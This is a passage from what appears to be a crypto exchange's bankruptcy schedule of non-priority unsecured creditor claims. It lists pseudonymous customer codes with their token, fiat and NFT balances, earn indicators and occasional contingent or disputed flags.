| 07330637 | | BTC[.00096256], USD[0.00] | Yes | |
| 07330638 | | CUSDT[1], DOGE[1], TRX[3], USD[0.00] | | |
| 07330639 | | BCH[1.13994003], BRZ[57.59046636], BTC[.00043551], CUSDT[4715.10481462], DOGE[1633.5922432], ETH[.01344216], ETHW[.01344216], GBP[7.18], SHIB[3537318.71241598], SOL[5.42277451], SUSHI[6.15021519], TRX[2881.18421933], USD[2.11], USDT[9.94805028] | | |
| 07330641 | | USD[10.00] | | |
| 07330642 | | USD[10.00] | | |
| 07330644 | | BCH[0.07356634], BRZ[2], CUSDT[11], DOGE[430.35495124], GRT[50.69778016], LTC[.34536854], TRX[4], USD[0.01] | | |
| 07330645 | | TRX[1], USD[10.00], USDT[0.00000003] | | |
| 07330646 | | DOGE[157.39294328], USD[0.00] | | |
| 07330648 | | DOGE[.12012129], SHIB[1], USD[0.00] | Yes | |
| 07330649 | | TRX[.543553] | | |
| 07330650 | | LTC[.18730087], TRX[2.88493012], USD[0.01] | | |
| 07330651 | | TRX[201.40674555], USD[0.00] | | |
| 07330654 | | DOGE[425.05700452], USD[0.00] | | |
| 07330655 | | DOGE[0], TRX[2], USD[0.00] | | |
| 07330656 | | USD[10.00] | | |
| 07330657 | | USD[10.00] | | |
| 07330658 | | BRZ[3], BTC[.097961], CUSDT[22], DOGE[2], ETH[2.09312143], ETHW[2.09224236], SHIB[1], TRX[6], USD[0.01] | Yes | |
| 07330659 | | BTC[0], ETH[.0004213], ETHW[.0004213], USD[0.00] | | |
| 07330660 | | USD[10.00] | | |
| 07330661 | | BTC[0], DOGE[0] | | |
| 07330662 | | USD[10.00] | | |
| 07330663 | | BAT[1], DOGE[5509.73754], GRT[75.91333831], SOL[3.56123486], SUSHI[7.43149567], TRX[1], USD[0.00], USDT[0.00000002] | | |
| 07330664 | | USD[10.00] | | |
| 07330665 | | BAT[0], BCH[0], DOGE[0], ETH[0], SHIB[1], SOL[0], TRX[40.83086389], USD[0.00] | Yes | |
| 07330666 | | BAT[1], BCH[0], BRZ[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07330667 | | CUSDT[2], DOGE[.00000006], TRX[1], USD[0.01] | | |
| 07330668 | | LINK[.32227905], USD[0.00] | | |
| 07330669 | | USD[10.00] | | |
| 07330670 | | USD[10.00] | | |
| 07330671 | | DOGE[0], USD[0.01] | | |
| 07330672 | | DOGE[0], GRT[1], NFT [436195055551944060/Enhanced Blueprints][1], USD[0.00], USDT[1] | | |
| 07330673 | | BAT[1], BRZ[2], CUSDT[7], GRT[1], TRX[1], USD[0.00] | | |
| 07330674 | | BRZ[4], CUSDT[5], DOGE[1845.01525557], USD[0.00], USDT[1] | | |
| 07330675 | | DOGE[0], ETH[0], USD[3.53] | | |
| 07330676 | | USD[10.00] | | |
| 07330677 | | USD[10.00] | | |
| 07330678 | | USD[10.00] | | |
| 07330680 | | USD[10.00] | | |
| 07330681 | | DOGE[16.82685156], USD[0.00] | | |
| 07330682 | | DOGE[92.36686875], TRX[1], USD[0.10] | | |
| 07330683 | | DOGE[237.92851818], USD[10.00] | | |
| 07330684 | | USD[10.00] | | |
| 07330685 | | CUSDT[2], DOGE[1], TRX[3], USD[0.01], USDT[0] | | |
| 07330687 | | ETH[.00623035], ETHW[.00623035], USD[0.00] | | |
| 07330689 | | USD[10.00] | | |
| 07330690 | | BTC[.00017867], USD[0.00] | | |
| 07330691 | | AVAX[2.0324429], BTC[.00261755], CUSDT[1], DOGE[13.59764266], ETH[.00251092], ETHW[.00248356], LINK[.22201034], MATIC[6.44114261], SHIB[71032.83439428], SOL[.10296951], TRX[65.07316614], UNI[.26711875], USD[14.77] | Yes | |
| 07330692 | | USD[10.00] | | |

Schedule F/3 - Non-priority Unsecured Creditor Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330693 | | DOGE[1], LTC[0.00402484], TRX[1], USD[0.00], USDT[.00001304] | Yes | |
| 07330694 | | DOGE[8951.72753859], TRX[1], USD[0.00] | | |
| 07330695 | | USD[0.01] | | |
| 07330696 | | CUSDT[4], DOGE[2224.20372902], USD[0.00] | | |
| 07330697 | | USD[10.00] | | |
| 07330698 | | BRZ[1], CUSDT[2], GRT[1.00498957], SUSHI[1.11027851], TRX[3], USD[0.00] | Yes | |
| 07330700 | | USD[10.00] | | |
| 07330701 | | CUSDT[1], USD[0.01] | | |
| 07330702 | | USD[10.00] | | |
| 07330703 | | USD[10.00] | | |
| 07330704 | | USD[10.00] | | |
| 07330705 | | USD[10.00] | | |
| 07330706 | | CUSDT[2], GRT[0], SOL[0], TRX[1], USD[0.00] | | |
| 07330707 | | DOGE[1], LINK[.34222407], USD[0.00] | Yes | |
| 07330708 | | CUSDT[1], DOGE[450.61999933], USD[1.00] | | |
| 07330711 | | BRZ[4], CUSDT[8], DOGE[1], ETH[2.07214011], ETHW[2.07214011], GRT[3], TRX[3], USD[0.00], USDT[1] | | |
| 07330712 | | USD[10.00] | | |
| 07330713 | | USD[10.00] | | |
| 07330714 | | CUSDT[5], DOGE[68.75569536], USD[0.00] | Yes | |
| 07330715 | | DOGE[1], USD[0.07] | | |
| 07330716 | | DOGE[.85138684], USD[2.63] | | |
| 07330717 | | BTC[.00181271], CUSDT[1], DOGE[7082.67090526], TRX[1], USD[10.00] | | |
| 07330718 | | USD[10.00] | | |
| 07330719 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07330720 | | USD[10.00] | | |
| 07330721 | | USD[0.00] | | |
| 07330722 | | AUD[0.00], BTC[0], ETHW[.00212876], NFT [289541177352077603/Symphony#8][1], NFT [298049731977619212/2D SOLDIER #584][1], NFT [299379123200776435/Space Bums #1807][1], NFT [303966104267272079/Miner Bot 23][1], NFT [304702485321951685/Space Bums #7291][1], NFT [310775659207561410/Miner Bot 523][1], NFT [316517776193637923/Red Panda #4176][1], NFT [320535272895359062/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #77][1], NFT [329017212646008297/Metaverse Masks #18][1], NFT [331683168207748578/Gangster Gorillas #1209][1], NFT [335090136409953355/Nespace Album #72][1], NFT [343320345480709412/Roamer #879][1], NFT [343582806062958347/Roamer #291][1], NFT [346240863841437241/Entrance Voucher #2061][1], NFT [353506596422246344/3D SOLDIER #60][1], NFT [356357832826992931/Fancy Frenchies #9517][1], NFT [362448276231333250/David #540][1], NFT [393379319343020714/#1566][1], NFT [393938733724662787/Astral Apes #726][1], NFT [407433672996669180/#1935][1], NFT [411906306106161699/Miner Bot 249][1], NFT [415852243797807927/Toy Soldier #005][1], NFT [422687835709542635/Idlekids #8357][1], NFT [422909190900337819/Metaverse Masks #19][1], NFT [428120693216995706/Save panda][1], NFT [438918442105748539/ApexDucks #99][1], NFT [446688904569378816/Cyber Pharmacist 3137][1], NFT [450161821379284378/Space Bums #2517][1], NFT [454131643178456840/Space Bums #2716][1], NFT [454647612958159557/Cadet 197][1], NFT [457208762994854026/Little Rocks #255][1], NFT [459306579208508326/Gloom Punk #1292][1], NFT [461100292024211616/Ravager #1935][1], NFT [461135818068518965/Guard 109][1], NFT [481093605471173675/Amethyst jewelfly][1], NFT [483038370618527632/Crypto Avatar Art #49][1], NFT [488491536867322497/3D CATPUNK #915][1], NFT [507287015764779644/Horse Number #13][1], NFT [516434961254187219/Idlekids #7409][1], NFT [518282278622209266/Nespace Album #78][1], NFT [532945282457970767/Box Heads #7][1], NFT [549808530560753106/Gangster Gorillas #1820][1], NFT [550695459727085042/Idlekids #610][1], NFT [553189066652283362/5774][1], NFT [564039438151834796/Crypto Skull Avatar #2][1], NFT [571050001013703526/SOLYETIS #2168][1], NFT [575564839986016762/Roamer #418][1], SHIB[2], SUSHI[0], USD[2255.61], USDT[0] | | |
| 07330723 | | USD[10.00] | | |
| 07330724 | | USD[10.00] | | |
| 07330725 | | CUSDT[4], DOGE[0], USD[0.00] | Yes | |
| 07330727 | | BRZ[1], CUSDT[5], USD[0.00], USDT[0] | | |
| 07330728 | | BRZ[1], BTC[.00043408], CUSDT[4], DOGE[3474.99615548], ETH[.00393955], ETHW[.00388483], TRX[78.48157653], USD[0.00] | Yes | |
| 07330729 | | BRZ[.00001651], DOGE[1], USD[0.00] | | |
| 07330730 | | BAT[0], CUSDT[2], DOGE[0], GBP[0.00], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07330731 | | USD[10.00] | | |
| 07330732 | | USD[10.00] | | |
| 07330733 | | TRX[1], USD[10.00] | | |
| 07330734 | | DOGE[133.28758903], USD[20.00] | | |
| 07330735 | | ETH[.00717019], ETHW[.00708059], NFT [335966151634412935/Coachella x FTX Weekend 1 #8590][1], USD[0.00] | Yes | |
| 07330736 | | USD[10.00] | | |
| 07330737 | | BAT[2], BRZ[4], CUSDT[2], DOGE[1548.89687708], GRT[1], SHIB[6], UNI[2], USD[0.00], USDT[0] | | |
| 07330738 | | DOGE[0], ETH[0.00554904], ETHW[0.00554904], SUSHI[0], TRX[5], USD[0.00] | | |
| 07330739 | | USD[10.00] | | |
| 07330740 | | CUSDT[1], DOGE[7043.31586123], TRX[309.98001959], USD[0.00] | | |
| 07330741 | | DOGE[1], USD[453.84] | | |
| 07330743 | | USD[10.00] | | |
| 07330744 | | USD[10.00] | | |
| 07330745 | | USD[10.00] | | |
| 07330746 | | CAD[6.15], DOGE[110.47165819], LTC[.02246318], USD[0.00] | | |
| 07330747 | | USD[0.01], USDT[0.00000001] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330748 | | USD[10.00] | | |
| 07330749 | | USD[10.00] | | |
| 07330750 | | USD[10.00] | | |
| 07330751 | | USD[10.00] | | |
| 07330752 | | DOGE[2807.52861786], SHIB[3413.34787948], USD[0.00] | Yes | |
| 07330754 | | CUSDT[1], USD[145.39668286], USD[0.00] | | |
| 07330755 | | BCH[.01254597], DOGE[600.5975458], ETH[.01111817], ETHW[.01111817], LTC[.03816262], TRX[156.90438936], USD[10.00] | | |
| 07330756 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07330757 | | USD[0.00] | | |
| 07330758 | | USD[10.00] | | |
| 07330760 | | BAT[0], BRZ[2.00174104], BTC[0.02007003], CUSDT[13], DOGE[16582.4829876], ETH[0.31207727], ETHW[0.31189202], GBP[0.00], GRT[452.98250714], TRX[6], UNI[30.62109557], USD[0.06], USDT[7.73732314] | Yes | |
| 07330761 | | BTC[0.00104735], DOGE[.04455], ETH[.01597815], ETHW[.01597815], USD[0.21] | | |
| 07330762 | | BTC[.00004716], DOGE[1], USD[0.00] | | |
| 07330763 | | USD[0.00], USDT[0] | Yes | |
| 07330765 | | DOGE[134.90273782], USD[0.00] | | |
| 07330766 | | USD[10.00] | | |
| 07330767 | | BF_POINT[300], USD[0.00] | Yes | |
| 07330768 | | BRZ[3], BTC[.01275504], CUSDT[22], DOGE[21718.65770379], ETH[.33129595], ETHW[.3311357], SHIB[5], SOL[3.9104014], TRX[13.07589155], USD[0.00] | Yes | |
| 07330769 | | CUSDT[4], DOGE[1], USD[0.00] | | |
| 07330770 | | DOGE[.06082426], USD[0.00] | | |
| 07330771 | | CUSDT[9], DOGE[.00004677], TRX[.00387718], USD[0.00] | Yes | |
| 07330772 | | USD[10.00] | | |
| 07330773 | | TRX[1], USD[0.01] | | |
| 07330774 | | DOGE[1114.2544971], USD[10.00] | | |
| 07330775 | | DOGE[14.91923087], USD[0.01] | | |
| 07330776 | | CUSDT[3], DOGE[7446.63855133], TRX[1], USD[0.00] | | |
| 07330777 | | USD[10.00] | | |
| 07330778 | | USD[10.00] | | |
| 07330779 | | BRZ[1], CUSDT[1], DOGE[125.73796695], GRT[12.20066093], TRX[247.79256304], USD[0.01] | | |
| 07330780 | | BRZ[2], USD[0.01] | | |
| 07330781 | | AAVE[5.45801849], BAT[1], BRZ[2], CUSDT[3], DOGE[1125.99214887], ETH[3.03480574], ETHW[3.03480574], LTC[3.64203674], SUSHI[75.31625947], TRX[5], USD[100.00], USDT[1] | | |
| 07330782 | | TRX[.0001622], USD[0.00] | | |
| 07330783 | | USD[10.00] | | |
| 07330785 | | USD[10.00] | | |
| 07330786 | | CUSDT[7], TRX[3], USD[40.86] | | |
| 07330787 | | SHIB[3337.42052592], USD[0.00] | Yes | |
| 07330788 | | CUSDT[1], DOGE[9686.20536754], ETH[1.98026511], ETHW[1.98026511], GRT[1], TRX[1], USD[0.00] | | |
| 07330789 | | USD[0.00] | Yes | |
| 07330790 | | USD[10.00] | | |
| 07330791 | | BRZ[1], CUSDT[1], DOGE[3215.76078616], USD[0.00] | | |
| 07330793 | | BTC[.00063188], DOGE[1], TRX[1], USD[0.00] | | |
| 07330794 | | USD[10.00] | | |
| 07330796 | | CUSDT[5], DOGE[540.69369607], KSHIB[478.51453775], SHIB[1], USD[0.01] | Yes | |
| 07330797 | | USD[10.00] | | |
| 07330798 | | GRT[7.80518155], USD[0.00] | Yes | |
| 07330799 | | USD[10.00] | | |
| 07330800 | Contingent, Disputed | BAT[0], BRZ[0], DOGE[0], ETH[0], GRT[0], UNI[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07330801 | | TRX[63.32089159], USD[0.00] | Yes | |
| 07330802 | | USD[10.00] | | |
| 07330803 | | CUSDT[3], DOGE[24.9829179], LINK[.00185096], USD[0.01] | | |
| 07330804 | | DOGE[1.00003583], USD[0.01] | | |
| 07330805 | | USD[10.00] | | |
| 07330806 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07330807 | | USD[10.00] | | |
| 07330808 | | BTC[0], DOGE[0], TRX[1], USD[0.00] | | |
| 07330809 | | USD[10.00] | | |
| 07330811 | | USD[0.00] | | |
| 07330812 | | BAT[0], BRZ[0], BTC[0], DOGE[364.42557935], ETH[0], LINK[0], PAXG[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330813 | | ETH[0], USD[0.00] | | |
| 07330815 | | USD[10.00] | | |
| 07330816 | | BRZ[1], USD[0.00] | | |
| 07330817 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07330818 | | BAT[1], BRZ[4], CUSDT[11], ETH[.36903466], ETHW[.36903466], TRX[10], USD[0.00], USDT[2] | | |
| 07330819 | | BRZ[1], CUSDT[2], DOGE[2518.41259896], TRX[3], USD[26.19] | Yes | |
| 07330820 | Contingent, Disputed | USD[0.10] | Yes | |
| 07330821 | | BTC[0], USD[5.72] | | |
| 07330822 | | LINK[.33551031], LTC[.00001851], TRX[1], USD[0.64] | | |
| 07330823 | | BAT[1], TRX[2], USD[0.01] | | |
| 07330824 | | SHIB[16.84274893], TRX[1], USD[0.00] | Yes | |
| 07330825 | | USD[10.00] | | |
| 07330826 | | BTC[.0043085], CUSDT[2], DOGE[2417.95484756], ETH[.09092556], ETHW[.08987626], LTC[0], SHIB[25285905.09716021], USD[0.00] | Yes | |
| 07330827 | | SHIB[2138824.0557489], USD[0.00] | Yes | |
| 07330828 | | USD[10.00] | | |
| 07330829 | | CUSDT[2], DOGE[1673.61029002], USD[0.00] | Yes | |
| 07330830 | | BRZ[3], CUSDT[2], DOGE[1], TRX[2], USD[0.00] | Yes | |
| 07330831 | | USD[0.87] | | |
| 07330832 | | USD[10.00] | | |
| 07330833 | | USD[10.99] | Yes | |
| 07330834 | | BTC[.0002225], USD[0.00] | | |
| 07330835 | | ETH[.13955951], ETHW[.13955951], LINK[0], NFT (533365291405022786/Coachella x FTX Weekend 2 #3136)[1], NFT (548762028742131896/Gangster Gorillas #1401)[1], SOL[4.14652339], TRX[3], USD[0.00] | | |
| 07330836 | | USD[10.00] | | |
| 07330837 | | USD[10.00] | | |
| 07330838 | | TRX[ 10093537], USD[0.00], USDT[0] | | |
| 07330840 | | USD[10.00] | | |
| 07330841 | | USD[10.00] | | |
| 07330842 | | USD[10.00] | | |
| 07330843 | | USD[10.00] | | |
| 07330844 | | BTC[.00144443], CUSDT[1], DOGE[3], TRX[1], USD[0.00] | | |
| 07330845 | | USD[10.00] | | |
| 07330846 | | DOGE[3], SHIB[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07330847 | | USD[0.00] | | |
| 07330848 | | USD[10.00] | | |
| 07330849 | | USD[0.00], USDT[0] | | |
| 07330850 | | BAT[0], DOGE[0], SOL[0], USD[0.00], USDT[0] | | |
| 07330851 | | USD[10.00] | | |
| 07330852 | | USD[0.00] | | |
| 07330853 | | USD[0.00] | | |
| 07330854 | | USD[10.00] | | |
| 07330855 | | USD[0.00] | | |
| 07330856 | | BTC[0], DOGE[0], ETH[0], GRT[0], SOL[0], USD[0.00] | | |
| 07330857 | | CUSDT[1], DOGE[.00069031], TRX[2], USD[39.51] | | |
| 07330858 | | CUSDT[2], DOGE[0], TRX[1], USD[0.00] | | |
| 07330859 | | BRZ[1], DOGE[744.66415033], ETH[.43522274], ETHW[.43522274], LTC[1.47837468], USD[0.00] | | |
| 07330861 | | USD[10.00] | | |
| 07330862 | | CUSDT[4], DOGE[138.6916031], TRX[1], USD[0.00] | Yes | |
| 07330863 | | USD[10.00] | | |
| 07330864 | | DOGE[21.47289746], TRX[120.71783336], USD[14.12] | | |
| 07330865 | | CUSDT[3], TRX[1], USD[57.80] | | |
| 07330866 | | CUSDT[2], DOGE[0], USD[0.00] | | |
| 07330867 | | BTC[.00050468], DOGE[2177.30174334], TRX[1], USD[0.01] | | |
| 07330868 | | TRX[95.70342999], USD[0.00] | | |
| 07330869 | | AVAX[4.23754383], BAT[119.82498411], ETH[5.21198171], ETHW[5.73264036], SHIB[1], TRX[1561.42770572], USD[0.00], USDT[0] | Yes | |
| 07330871 | | USD[10.00] | | |
| 07330872 | | BRZ[1], TRX[1], USD[7.00] | | |
| 07330873 | | USD[10.00] | | |
| 07330874 | | TRX[188.11412206], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330875 | | DOGE[949], ETH[.00005917], ETHW[.00005917], USD[0.00] | | |
| 07330876 | | DAI[.00003018], DOGE[2], USD[0.00], USDT[0] | | |
| 07330878 | | DOGE[1], USD[0.00] | Yes | |
| 07330879 | | BRZ[2], CUSDT[5], DOGE[2], TRX[1], USD[0.01], USDT[0] | | |
| 07330880 | | USD[10.00] | | |
| 07330881 | | DOGE[0], TRX[0], USD[7.29], USDT[0] | | |
| 07330882 | | AAVE[.00317537], BAT[2.06378486], BCH[.00002923], BRZ[7.54525024], CUSDT[48.76691387], DOGE[5], ETH[.00185870], ETHW[.00183134], GRT[1], MKR[.00031188], SHIB[6], TRX[16.74632585], USD[10.09], USDT[0.00031337] | Yes | |
| 07330883 | | USD[10.00] | | |
| 07330884 | | BRZ[0], DOGE[0], USD[0.00] | Yes | |
| 07330885 | | LTC[.00397593], USD[11.10] | Yes | |
| 07330886 | | USD[10.00] | | |
| 07330887 | | USD[10.00] | | |
| 07330888 | | DOGE[.13824654], USD[0.00] | | |
| 07330889 | | BTC[0], DOGE[0], ETH[0], LINK[0], MATIC[8.03726314], SOL[0], USD[0.00] | | |
| 07330891 | | BTC[0], ETH[.00052922], ETHW[.00052922], LTC[.00408], TRX[0.62669077], USD[10.04], USDT[2.13700625] | | |
| 07330892 | | USD[10.00] | | |
| 07330893 | | BAT[.0008158], BF_POINT[600], BRZ[2], CUSDT[13], DOGE[13.97182015], MATIC[1.00164518], SHIB[.07644966], TRX[4], UNI[.00004908], USD[0.02] | Yes | |
| 07330894 | | CUSDT[2341.36080906], DOGE[214.58015529], TRX[340.88932251], USD[0.01] | | |
| 07330895 | | USD[10.00] | | |
| 07330896 | | USD[10.00] | | |
| 07330897 | | USD[10.00] | | |
| 07330898 | | USD[0.00] | Yes | |
| 07330899 | | USD[10.00] | | |
| 07330900 | | AAVE[.10120554], AVAX[.7447895], BCH[.32480694], BTC[.00738759], DOGE[108.59017061], ETH[0.16303144], ETHW[0.15396593], LINK[4.15994063], MATIC[319.34846572], NEAR[1.7051233], NFT [34938223237215244/FTX - Off The Grid Miami #2880][1], SHIB[6918974.68249126], SOL[14.72064734], SUSHI[3.2131816], TRX[773.96628381], UNI[.90835351], USD[91.51] | Yes | |
| 07330901 | | BAT[.0000101], USD[0.00] | | |
| 07330902 | | USD[10.00] | | |
| 07330903 | | DOGE[1], USD[0.00] | | |
| 07330904 | | USD[10.00] | | |
| 07330905 | | BRZ[0], BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07330906 | | USD[10.00] | | |
| 07330907 | | CUSDT[1094.97601447], DOGE[13212.1878347], TRX[1143.06155405], USD[9.93] | Yes | |
| 07330909 | | CUSDT[1], DOGE[1], SHIB[1], USD[182.74] | | |
| 07330910 | | DOGE[1], USD[10.00] | | |
| 07330911 | | USD[10.00] | | |
| 07330912 | | BAT[0], BTC[0], DOGE[0], GRT[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07330913 | | USD[10.00] | | |
| 07330914 | | BAT[1], BRZ[2], CUSDT[1], DAI[0], DOGE[0], ETH[0], LTC[0], TRX[4], UNI[0], USD[0.00] | | |
| 07330915 | | USD[10.00] | | |
| 07330916 | | USD[10.00] | | |
| 07330917 | | CUSDT[1], DOGE[1.18849698], ETH[0.00000001], ETHW[0.00000001], USD[0.00] | | |
| 07330918 | | USD[0.00] | | |
| 07330919 | | USD[10.00] | | |
| 07330920 | | CUSDT[1], DOGE[139.62461364], USD[0.00] | | |
| 07330921 | | USD[10.00] | | |
| 07330922 | | USD[10.00] | | |
| 07330923 | | DOGE[31.37252619], USD[10.38] | | |
| 07330924 | | DOGE[19.77734345], USD[0.00] | | |
| 07330925 | | USD[10.00] | | |
| 07330926 | | USD[10.00] | | |
| 07330927 | | USD[10.00] | | |
| 07330928 | | USD[10.00] | | |
| 07330929 | | USD[10.00] | | |
| 07330930 | | CUSDT[1], DOGE[7257.49981348], USD[0.00] | Yes | |
| 07330931 | | DOGE[1113.47340308], SOL[1.31736249], TRX[1], USD[0.00] | | |
| 07330932 | | ETH[.00001515], ETHW[.00001515], USD[0.00] | Yes | |
| 07330933 | | USD[10.00] | | |
| 07330934 | | DOGE[32.15193409], USD[0.00] | | |
| 07330935 | | BAT[21.25095398], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330936 | | USD[0.00] | | |
| 07330937 | | CUSDT[1], DOGE[2.7302083], USD[0.00] | | |
| 07330938 | | USD[0.00] | | |
| 07330939 | | BTC[.00008772], CUSDT[2], DOGE[.00095854], TRX[1], USD[0.73] | | |
| 07330940 | | CUSDT[5], DOGE[2], TRX[2], USD[0.01] | Yes | |
| 07330941 | | CUSDT[5], DOGE[1230.84249514], USD[0.00] | | |
| 07330942 | | DOGE[.00174689], USD[0.00] | Yes | |
| 07330944 | | USD[0.00] | | |
| 07330945 | | BRZ[1], CUSDT[2], SHIB[1], USD[0.01] | | |
| 07330946 | | USD[0.00] | | |
| 07330947 | | USD[0.00] | | |
| 07330949 | | USD[0.00] | | |
| 07330950 | | BTC[.00090861], CUSDT[1], DOGE[1], ETH[.00973213], ETHW[.00960901], SHIB[1], TRX[183.1033663], USD[0.01] | Yes | |
| 07330951 | | USD[0.00] | | |
| 07330952 | | USD[0.00] | | |
| 07330953 | | USD[0.00] | | |
| 07330954 | | USD[0.00] | | |
| 07330955 | | BRZ[1], BTC[0.00000001], CUSDT[4], ETH[0], USD[0.00] | Yes | |
| 07330956 | | DOGE[149.85466404], CUSDT[0] | Yes | |
| 07330957 | | USD[0.20] | | |
| 07330958 | | USD[0.00] | | |
| 07330960 | | DOGE[0.53746244], TRX[0], USD[0.00] | Yes | |
| 07330961 | | USD[0.00] | | |
| 07330962 | | DOGE[0.92046937], ETH[0], USD[0.00] | | |
| 07330963 | | BRZ[2], DOGE[3], ETH[0], ETHW[0], SHIB[2], SOL[0], TRX[1], USD[0.00], USDT[0.00000003] | Yes | |
| 07330964 | | USD[0.00] | | |
| 07330965 | | USD[0.00] | | |
| 07330966 | | DOGE[1.04904177], USD[0.00] | Yes | |
| 07330968 | | USD[0.00] | | |
| 07330969 | | USD[0.00] | | |
| 07330970 | | USD[0.00] | | |
| 07330971 | | BTC[0], DOGE[0], GRT[9.95313762], USD[0.03] | | |
| 07330972 | | USD[0.00] | | |
| 07330973 | | BRZ[1], BTC[.00015746], CUSDT[3], DOGE[1038.06729383], ETH[.06023174], ETHW[.06023174], GRT[1], TRX[205.57126771], USD[0.00] | | |
| 07330974 | | BTC[0], DOGE[.00003537], GRT[1.00498957], USD[11.07] | Yes | |
| 07330975 | | AAVE[0], BAT[0], BRZ[2], BTC[0], DOGE[2.54621994], ETH[0], GRT[0.00925206], PAXG[0.00000238], SHIB[14], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[0.00013801], YFI[0] | Yes | |
| 07330976 | | ETH[.00598231], ETHW[.00591391], USD[0.00] | Yes | |
| 07330977 | | USD[0.00] | | |
| 07330978 | | USD[0.00] | | |
| 07330979 | | USD[0.00] | | |
| 07330980 | | BRZ[0], USD[0.00] | Yes | |
| 07330981 | | USD[0.00] | | |
| 07330982 | | USD[0.00] | | |
| 07330983 | | USD[0.00] | | |
| 07330984 | | USD[0.00] | | |
| 07330985 | | ETH[.00561947], ETHW[.00561947], USD[0.00] | | |
| 07330986 | | BTC[.00000001], CUSDT[9], DOGE[.71413659], USD[0.01] | | |
| 07330987 | | DOGE[66.52483571], GRT[.00644486], KSHIB[36.22533463], TRX[14.12847348], USD[2.53], YFI[.00000006] | Yes | |
| 07330988 | | DOGE[1.26300629], USD[1.82] | | |
| 07330989 | | CUSDT[1], ETH[.00007673], ETHW[.00007673], SOL[1.10017567], TRX[1.06080382], USD[0.00] | Yes | |
| 07330990 | | USD[0.00] | | |
| 07330991 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07330992 | | USD[0.00] | | |
| 07330993 | | USD[0.00] | | |
| 07330994 | | BTC[.00018017], CUSDT[2], DOGE[1], TRX[391.09734567], USD[0.00] | | |
| 07330995 | | USD[0.00], USDT[0] | | |
| 07330996 | | ALGO[0], AVAX[0], ETH[0], ETHW[0], MATIC[0], SHIB[0], SOL[0.00000075], USD[0.01] | Yes | |
| 07330997 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330998 | | USD[10.00] | | |
| 07330999 | | CUSDT[1.11482669], DOGE[24.39854196], USD[0.03] | | |
| 07331000 | | USD[10.00] | | |
| 07331001 | | BAT[1], BRZ[4], CUSDT[19], ETH[0.00380004], ETHW[0.00375900], SHIB[3], TRX[1], USD[0.36], USDT[0.00000001] | Yes | |
| 07331002 | | CUSDT[4], DOGE[812.7698736], TRX[1], USD[0.00] | | |
| 07331003 | | USD[0.00] | | |
| 07331004 | | USD[10.00] | | |
| 07331005 | | USD[10.00] | | |
| 07331006 | | USD[10.00] | | |
| 07331007 | | USD[0.00], USDT[0] | | |
| 07331008 | | USD[0.01] | | |
| 07331009 | | BRZ[1], CUSDT[2], GRT[1.00195628], SHIB[3816656.90868689], SOL[.00000934], TRX[1], USD[0.01] | Yes | |
| 07331010 | | USD[10.00] | | |
| 07331012 | | DOGE[1.06677532], USD[0.00] | | |
| 07331013 | | USD[10.00] | | |
| 07331015 | | BRZ[1], DOGE[1], ETH[0.15609183], ETHW[0.15609183], TRX[1], USD[10.00] | | |
| 07331016 | | USD[10.00] | | |
| 07331017 | | DOGE[42.96540708], USD[0.00] | | |
| 07331019 | | USD[10.00] | | |
| 07331020 | | DOGE[255.63182473], USD[10.00] | | |
| 07331022 | | USD[10.00] | | |
| 07331025 | | BTC[.00310045], DOGE[50.36583658], USD[0.03] | | |
| 07331026 | | CUSDT[1], DOGE[3283.27232839], USD[409.28] | | |
| 07331027 | | BTC[.00095262], CUSDT[1], DOGE[1], TRX[659.15531438], USD[0.01] | | |
| 07331028 | | BRZ[2], CUSDT[2], DOGE[.36280602], USD[0.00] | | |
| 07331029 | | USD[10.00] | | |
| 07331030 | | CUSDT[0.00003734], ETH[0.02130274], ETHW[0.02130274], USD[0.00], USDT[0] | | |
| 07331031 | | USD[10.00] | | |
| 07331032 | | USD[0.00] | | |
| 07331033 | | USD[10.00] | | |
| 07331034 | | USD[10.00] | | |
| 07331035 | | BAT[1], BRZ[1], BTC[0], CUSDT[7], DOGE[1], ETH[0], SHIB[1], SOL[.00004003], TRX[3], USD[0.00] | Yes | |
| 07331036 | | USD[10.00] | | |
| 07331039 | | USD[10.00] | | |
| 07331041 | | USD[10.00] | | |
| 07331042 | | DOGE[278.2112379], TRX[1], USD[0.00] | | |
| 07331043 | | USD[10.00] | | |
| 07331044 | | BRZ[2], BTC[.00174299], CUSDT[10], DOGE[1515.21397412], ETH[.11584178], ETHW[.11584178], GRT[32.68000199], LINK[2.87946449], TRX[4], USD[92.51], USDT[1] | | |
| 07331045 | | USD[10.00] | | |
| 07331046 | | USD[0.00] | Yes | |
| 07331048 | | USD[10.00] | | |
| 07331050 | | BRZ[1], BTC[.00019132], TRX[1], USD[0.01] | | |
